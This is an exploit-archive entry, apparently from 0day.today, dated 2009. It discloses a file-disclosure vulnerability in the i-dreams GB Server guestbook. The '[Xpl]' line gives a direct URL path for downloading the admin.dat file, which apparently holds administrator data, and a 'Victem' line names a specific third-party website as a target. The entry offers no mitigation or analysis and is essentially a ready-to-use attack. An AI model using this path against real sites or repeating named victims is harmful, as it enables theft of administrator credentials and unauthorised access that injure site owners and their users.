id: 4872
date: 02/20/2009
title: i-dreams GB Server (admin.dat) File Disclosure Vulnerability
author: Pouya_Server
cves: 

============================================================
i-dreams GB Server (admin.dat) File Disclosure Vulnerability
============================================================


#########################################################
---------------------------------------------------------
Portal Name: i-dreams.net GB Server
Author : Pouya_Server 
---------------------------------------------------------
#########################################################
[Xpl]:
http://site.com/[Path]/admdat/admin.dat
------------------------------------------
Victem :
http://www.comp-tech.at/guestbook/users/demo
---------------------------------------------------------
#########################################################



#  0day.today [2023-03-27]  #